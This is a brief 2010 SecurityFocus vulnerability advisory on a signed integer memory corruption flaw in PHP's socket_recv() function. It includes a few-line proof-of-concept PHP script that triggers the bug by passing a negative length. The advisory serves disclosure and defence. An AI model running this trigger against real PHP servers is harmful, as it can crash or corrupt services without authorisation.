PHP socket_recv() Signed Integer Memory Corruption Vulnerability

The following proof of concept was provided:

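<?php
// Receive buffer, passed to socket_recv() by reference.
$buf = "";
// The third argument (length) is negative: -3.
socket_recv(socket_create(AF_INET, SOCK_STREAM, 0), $buf, -3, 0);
?>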


 

Copyright 2010, SecurityFocus